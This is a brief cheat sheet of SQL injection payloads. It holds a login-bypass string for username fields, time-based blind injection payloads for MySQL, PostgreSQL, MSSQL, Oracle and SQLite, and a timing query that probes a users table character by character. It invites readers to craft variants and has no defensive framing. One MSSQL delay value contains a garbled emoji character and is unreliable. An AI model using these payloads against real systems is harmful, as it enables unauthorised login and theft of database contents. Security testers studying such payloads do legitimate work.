
Some Authentication by-pass SQLis, (in the username field)

Try this one, and or different variations of it, it's possible to bypass the login
can possibly hand roll others based on this example

'or+1=1+;+--+-"
'or+1=1+;+--+-"
'or+1=1+;+--+-"

---------------Some Timing Payloads----------------

MySQL (string concat and logical ops)
1' + sleep(10)
1' and sleep(10)
1' && sleep(10)
1' | sleep(10)

PostgreSQL (only support string concat)
1' || pg_sleep(10)

MSQL
1' WAITFOR DELAY '00️⃣10'

Oracle
1' AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])
1' AND 123=DBMS_PIPE.RECEIVE_MESSAGE('ASD',10)

SQLite
1' AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))
1' AND 123=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))


A Time Based Exploits

1 and (select sleep(10) from users where SUBSTR(table_name,1,1) = 'A')#

can possibly hand roll others based on that





